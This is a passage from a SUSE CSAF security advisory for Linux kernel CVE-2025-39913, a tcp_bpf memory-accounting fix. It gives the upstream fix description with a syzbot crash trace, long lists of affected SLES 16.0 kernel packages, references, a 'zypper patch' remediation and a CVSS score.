"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp_bpf: Call sk_msg_free() when tcp_bpf_send_verdict() fails to allocate psock-\u003ecork.\n\nsyzbot reported the splat below. [0]\n\nThe repro does the following:\n\n 1. Load a sk_msg prog that calls bpf_msg_cork_bytes(msg, cork_bytes)\n 2. Attach the prog to a SOCKMAP\n 3. Add a socket to the SOCKMAP\n 4. Activate fault injection\n 5. Send data less than cork_bytes\n\nAt 5., the data is carried over to the next sendmsg() as it is\nsmaller than the cork_bytes specified by bpf_msg_cork_bytes().\n\nThen, tcp_bpf_send_verdict() tries to allocate psock-\u003ecork to hold\nthe data, but this fails silently due to fault injection + __GFP_NOWARN.\n\nIf the allocation fails, we need to revert the sk-\u003esk_forward_alloc\nchange done by sk_msg_alloc().\n\nLet\u0027s call sk_msg_free() when tcp_bpf_send_verdict fails to allocate\npsock-\u003ecork.\n\nThe \"*copied\" also needs to be updated such that a proper error can\nbe returned to the caller, sendmsg. It fails to allocate psock-\u003ecork.\nNothing has been corked so far, so this patch simply sets \"*copied\"\nto 0.\n\n[0]:\nWARNING: net/ipv4/af_inet.c:156 at inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156, CPU#1: syz-executor/5983\nModules linked in:\nCPU: 1 UID: 0 PID: 5983 Comm: syz-executor Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/12/2025\nRIP: 0010:inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156\nCode: 0f 0b 90 e9 62 fe ff ff e8 7a db b5 f7 90 0f 0b 90 e9 95 fe ff ff e8 6c db b5 f7 90 0f 0b 90 e9 bb fe ff ff e8 5e db b5 f7 90 \u003c0f\u003e 0b 90 e9 e1 fe ff ff 89 f9 80 e1 07 80 c1 03 38 c1 0f 8c 9f fc\nRSP: 0018:ffffc90000a08b48 EFLAGS: 00010246\nRAX: ffffffff8a09d0b2 RBX: dffffc0000000000 RCX: ffff888024a23c80\nRDX: 0000000000000100 RSI: 0000000000000fff RDI: 0000000000000000\nRBP: 0000000000000fff R08: ffff88807e07c627 R09: 1ffff1100fc0f8c4\nR10: dffffc0000000000 R11: ffffed100fc0f8c5 R12: ffff88807e07c380\nR13: dffffc0000000000 R14: ffff88807e07c60c R15: 1ffff1100fc0f872\nFS: 00005555604c4500(0000) GS:ffff888125af1000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00005555604df5c8 CR3: 0000000032b06000 CR4: 00000000003526f0\nCall Trace:\n \u003cIRQ\u003e\n __sk_destruct+0x86/0x660 net/core/sock.c:2339\n rcu_do_batch kernel/rcu/tree.c:2605 [inline]\n rcu_core+0xca8/0x1770 kernel/rcu/tree.c:2861\n handle_softirqs+0x286/0x870 kernel/softirq.c:579\n __do_softirq kernel/softirq.c:613 [inline]\n invoke_softirq kernel/softirq.c:453 [inline]\n __irq_exit_rcu+0xca/0x1f0 kernel/softirq.c:680\n irq_exit_rcu+0x9/0x30 kernel/softirq.c:696\n instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1052 [inline]\n sysvec_apic_timer_interrupt+0xa6/0xc0 arch/x86/kernel/apic/apic.c:1052\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39913",
"url": "https://www.suse.com/security/cve/CVE-2025-39913"
},
{
"category": "external",
"summary": "SUSE Bug 1250705 for CVE-2025-39913",
"url": "https://bugzilla.suse.com/1250705"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
